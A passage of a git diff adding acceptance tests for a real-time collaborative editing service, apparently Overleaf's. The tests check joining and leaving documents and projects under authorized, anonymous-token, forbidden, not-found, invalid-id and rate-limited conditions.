RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes('invalid-doc-id')).to.equal( + false + ) + return done() + } + ) + }) + }) + + describe('with a fromVersion', function () { + before(function (done) { + this.fromVersion = 36 + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.fromVersion, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('with options', function () { + before(function (done) { + this.options = { encodeRanges: true } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.options, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the default fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + return describe('with fromVersion and options', function () { + before(function (done) { + this.fromVersion = 36 + this.options = { encodeRanges: true } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.fromVersion, + this.options, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/JoinProjectTests.js b/services/real-time/test/acceptance/js/JoinProjectTests.js new file mode 100644 index 0000000..bfb354c --- /dev/null +++ b/services/real-time/test/acceptance/js/JoinProjectTests.js @@ -0,0 +1,861 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('joinProject', function () { + describe('when authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + return MockWebServer.joinProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + it('should return the project', function () { + return this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.user_id }, + }) + }) + + it('should return the privilege level', function () { + return this.privilegeLevel.should.equal('owner') + }) + + it('should return the protocolVersion', function () { + return this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + return done() + } + ) + }) + + return it('should have marked the user as connected', function (done) { + return this.client.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if ( + user.client_id === this.client.publicId && + user.user_id === this.user_id + ) { + connected = true + break + } + } + expect(connected).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorized with token', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + publicAccess: 'readOnly', + project: { + name: 'Test Project', + }, + }, + ( + e, + { + user_id: ownerId, + project_id: projectId, + anonymousAccessToken, + } + ) => { + this.ownerId = ownerId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + cb(e) + } + ) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith( + this.project_id, + 'anonymous-user', + this.anonymousAccessToken + ) + .should.equal(true) + }) + + it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.ownerId }, + }) + }) + + it('should return the privilege level', function () { + this.privilegeLevel.should.equal('readOnly') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if (user.client_id === this.client.publicId) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when not authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: null, + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.error = error + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return this.error.message.should.equal('not authorized') + }) + + return it('should not have joined the project room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + return done() + } + ) + }) + }) + + describe('when not authorized and web replies with a 403', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + project_id: '403403403403403403403403', // forbidden + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, error => { + this.error = error + cb() + }) + }, + ], + done + ) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient(this.client.socket.sessionid, error => { + expect(error.message).to.equal('not found') + done() + }) + }) + }) + + describe('when deleted and web replies with a 404', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + project_id: '404404404404404404404404', // not-found + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, error => { + this.error = error + cb() + }) + }, + ], + done + ) + }) + + it('should return an error', function () { + this.error.code.should.equal('ProjectNotFound') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient(this.client.socket.sessionid, error => { + expect(error.message).to.equal('not found') + done() + }) + }) + }) + + describe('when invalid', function () { + before(function (done) { + MockWebServer.joinProject.resetHistory() + return async.series( + [ + cb => { + this.client = RealTimeClient.connect('invalid-id', error => { + this.error = error + return cb() + }) + }, + ], + done + ) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal( + 'missing/bad ?projectId=... query flag on handshake' + ) + }) + + it('should not call to web', function () { + MockWebServer.joinProject.called.should.equal(false) + }) + }) + + describe('when over rate limit', function () { + before(function (done) { + return async.series( + [ + cb => { + this.client = RealTimeClient.connect( + '429429429429429429429429', // rate-limited + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + return it('should return a TooManyRequests error code', function () { + this.error.message.should.equal('rate-limit hit when joining project') + return this.error.code.should.equal('TooManyRequests') + }) + }) + + describe('when automatically joining the project', function () { + describe('when authorized', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (err, project, permissionsLevel, protocolVersion) => { + this.project = project + this.permissionsLevel = permissionsLevel + this.protocolVersion = protocolVersion + cb(err) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.user_id }, + }) + }) + + it('should return the privilege level', function () { + this.permissionsLevel.should.equal('owner') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if ( + user.client_id === this.client.publicId && + user.user_id === this.user_id + ) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when authorized with token', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + publicAccess: 'readOnly', + project: { + name: 'Test Project', + }, + }, + ( + e, + { + user_id: ownerId, + project_id: projectId, + anonymousAccessToken, + } + ) => { + this.ownerId = ownerId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + cb(e) + } + ) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (err, project, permissionsLevel, protocolVersion) => { + this.project = project + this.permissionsLevel = permissionsLevel + this.protocolVersion = protocolVersion + cb(err) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith( + this.project_id, + 'anonymous-user', + this.anonymousAccessToken + ) + .should.equal(true) + }) + + it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.ownerId }, + }) + }) + + it('should return the privilege level', function () { + this.permissionsLevel.should.equal('readOnly') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if (user.client_id === this.client.publicId) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when not authorized', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: null, + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when not authorized and web replies with a 403', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + project_id: '403403403403403403403403', // forbidden + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when deleted and web replies with a 404', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + project_id: '404404404404404404404404', // not-found + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an error', function () { + this.error.code.should.equal('ProjectNotFound') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + done() + } + ) + }) + }) + + describe('when invalid', function () { + let joinProjectResponseReceived = false + before(function (done) { + MockWebServer.joinProject.resetHistory() + async.series( + [ + cb => { + this.client = RealTimeClient.connect('invalid-id', err => { + this.error = err + cb() + }) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal( + 'missing/bad ?projectId=... query flag on handshake' + ) + }) + + it('should not call to web', function () { + MockWebServer.joinProject.called.should.equal(false) + }) + }) + + describe('when over rate limit', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + this.client = RealTimeClient.connect( + '429429429429429429429429', + err => { + this.error = err + cb() + } + ) + this.client.on('joinProjectResponse', () => { + joinProjectResponseReceived = true + cb() + }) + }, + ], + done + ) + }) + + it('should not emit joinProjectResponse', function () { + expect(joinProjectResponseReceived).to.equal(false) + }) + + it('should have disconnected the client', function () { + expect(this.client.socket.connected).to.equal(false) + }) + + it('should return a TooManyRequests error code', function () { + this.error.message.should.equal('rate-limit hit when joining project') + this.error.code.should.equal('TooManyRequests') + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/LeaveDocTests.js b/services/real-time/test/acceptance/js/LeaveDocTests.js new file mode 100644 index 0000000..13a0236 --- /dev/null +++ b/services/real-time/test/acceptance/js/LeaveDocTests.js @@ -0,0 +1,178 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') +const logger = require('@overleaf/logger') + +const async = require('async') + +describe('leaveDoc', function () { + before(function () { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + sinon.spy(logger, 'error') + sinon.spy(logger, 'warn') + sinon.spy(logger, 'debug') + return (this.other_doc_id = FixturesManager.getRandomId()) + }) + + after(function () { + logger.error.restore() // remove the spy + logger.warn.restore() + return logger.debug.restore() + }) + + return describe('when joined to a doc', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + describe('then leaving the doc', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', this.doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + return it('should have left the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal( + false + ) + return done() + } + ) + }) + }) + + describe('then leaving an invalid doc', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', 'bad-id', error => { + this.error = error + return done() + }) + }) + + return it('should return an error', function () { + return expect(this.error).to.exist + }) + }) + + describe('when sending a leaveDoc request before the previous joinDoc request has completed', function () { + beforeEach(function (done) { + this.client.emit('leaveDoc', this.doc_id, () => {}) + this.client.emit('joinDoc', this.doc_id, () => {}) + return this.client.emit('leaveDoc', this.doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + it('should not trigger an error', function () { + return sinon.assert.neverCalledWith( + logger.error, + sinon.match.any, + "not subscribed - shouldn't happen" + ) + }) + + return it('should have left the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal( + false + ) + return done() + } + ) + }) + }) + + return describe('when sending a leaveDoc for a room the client has not joined ', function () { + beforeEach(function (done) { + return this.client.emit('leaveDoc', this.other_doc_id, error => { + if (error != null) { + throw error + } + return done() + }) + }) + + return it('should trigger a low level message only', function () { + return sinon.assert.calledWith( + logger.debug, + sinon.match.any, + 'ignoring request from client to leave room it is not in' + ) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/LeaveProjectTests.js b/services/real-time/test/acceptance/js/LeaveProjectTests.js new file mode 100644 index 0000000..bf06421 --- /dev/null +++ b/services/real-time/test/acceptance/js/LeaveProjectTests.js @@ -0,0 +1,235 @@ +/* eslint-disable + no-throw-literal, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +describe('leaveProject', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('with other clients in the project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + + this.clientBDisconnectMessages = [] + return this.clientB.on( + 'clientTracking.clientDisconnected', + data => { + return this.clientBDisconnectMessages.push(data) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + cb => { + return this.clientB.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + // leaveProject is called when the client disconnects + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // The API waits a little while before flushing changes + return setTimeout(done, 1000) + }, + ], + done + ) + }) + + it('should emit a disconnect message to the room', function () { + return this.clientBDisconnectMessages.should.deep.equal([ + this.clientA.publicId, + ]) + }) + + it('should no longer list the client in connected users', function (done) { + return this.clientB.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + for (const user of Array.from(users)) { + if (user.client_id === this.clientA.publicId) { + throw 'Expected clientA to not be listed in connected users' + } + } + return done() + } + ) + }) + + it('should not flush the project to the document updater', function () { + return MockDocUpdaterServer.deleteProject + .calledWith(this.project_id) + .should.equal(false) + }) + + it('should remain subscribed to the editor-events channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + + return it('should remain subscribed to the applied-ops channels', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) + + return describe('with no other clients in the project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + // leaveProject is called when the client disconnects + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // The API waits a little while before flushing changes + return setTimeout(done, 1000) + }, + ], + done + ) + }) + + it('should flush the project to the document updater', function () { + return MockDocUpdaterServer.deleteProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should not subscribe to the editor-events channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + + return it('should not subscribe to the applied-ops channels anymore', function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + resp.should.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + return null + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/MatrixTests.js b/services/real-time/test/acceptance/js/MatrixTests.js new file mode 100644 index 0000000..5f4b4e6 --- /dev/null +++ b/services/real-time/test/acceptance/js/MatrixTests.js @@ -0,0 +1,494 @@ +/* +This test suite is a multi level matrix which allows us to test many cases + with all kinds of setups. + +Users/Actors are defined in USERS and are a low level entity that does connect + to a real-time pod. A typical UserItem is: + + someDescriptiveNameForTheTestSuite: { + setup(cb) { + // <setup session here> + const options = { client: RealTimeClient.connect(), foo: 'bar' } + cb(null, options) + } + } + +Sessions are a set of actions that a User performs in the life-cycle of a + real-time session, before they try something weird. A typical SessionItem is: + + someOtherDescriptiveNameForTheTestSuite: { + getActions(cb) { + cb(null, [ + { rpc: 'RPC_ENDPOINT', args: [...] } + ]) + } + } + +Finally there are InvalidRequests which are the weird actions I hinted on in + the Sessions section. The defined actions may be marked as 'failed' to denote + that real-time rejects them with an (for this test) expected error. + A typical InvalidRequestItem is: + + joinOwnProject: { + getActions(cb) { + cb(null, [ + { rpc: 'RPC_ENDPOINT', args: [...], failed: true } + ]) + } + } + +There is additional meta-data that UserItems and SessionItems may use to skip + certain areas of the matrix. Theses are: + +- Has the User an own project that they join as part of the Session? + UserItem: { hasOwnProject: true, setup(cb) { cb(null, { project_id, ... }) }} + SessionItem: { needsOwnProject: true } + */ + +const { expect } = require('chai') +const async = require('async') + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') +const MockWebServer = require('./helpers/MockWebServer') + +const settings = require('@overleaf/settings') +const Keys = settings.redis.documentupdater.key_schema +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) + +function getPendingUpdates(docId, cb) { + rclient.lrange(Keys.pendingUpdates({ doc_id: docId }), 0, 10, cb) +} +function cleanupPreviousUpdates(docId, cb) { + rclient.del(Keys.pendingUpdates({ doc_id: docId }), cb) +} + +describe('MatrixTests', function () { + let privateProjectId, + privateDocId, + readWriteProjectId, + readWriteDocId, + readWriteAnonymousAccessToken + + let privateClient + before(function setupPrivateProject(done) { + FixturesManager.setUpEditorSession( + { privilegeLevel: 'owner', publicAccessLevel: 'readAndWrite' }, + (err, { project_id: projectId, doc_id: docId }) => { + if (err) return done(err) + privateProjectId = projectId + privateDocId = docId + privateClient = RealTimeClient.connect(projectId, err => { + if (err) return done(err) + privateClient.emit('joinDoc', privateDocId, done) + }) + } + ) + }) + + before(function setupReadWriteProject(done) { + FixturesManager.setUpEditorSession( + { + publicAccess: 'readAndWrite', + }, + (err, { project_id: projectId, doc_id: docId, anonymousAccessToken }) => { + readWriteProjectId = projectId + readWriteDocId = docId + readWriteAnonymousAccessToken = anonymousAccessToken + done(err) + } + ) + }) + + const USER_SETUP = { + anonymous: { + setup(cb) { + RealTimeClient.setAnonSession( + readWriteProjectId, + readWriteAnonymousAccessToken, + err => { + if (err) return cb(err) + cb(null, {}) + } + ) + }, + }, + + registered: { + setup(cb) { + const userId = FixturesManager.getRandomId() + const user = { _id: userId, first_name: 'Joe', last_name: 'Bloggs' } + RealTimeClient.setSession({ user }, err => { + if (err) return cb(err) + + MockWebServer.inviteUserToProject( + readWriteProjectId, + user, + 'readAndWrite' + ) + cb(null, { + user_id: userId, + }) + }) + }, + }, + + registeredWithOwnedProject: { + setup(cb) { + FixturesManager.setUpEditorSession( + { privilegeLevel: 'owner' }, + (err, { project_id: projectId, user_id: userId, doc_id: docId }) => { + if (err) return cb(err) + + 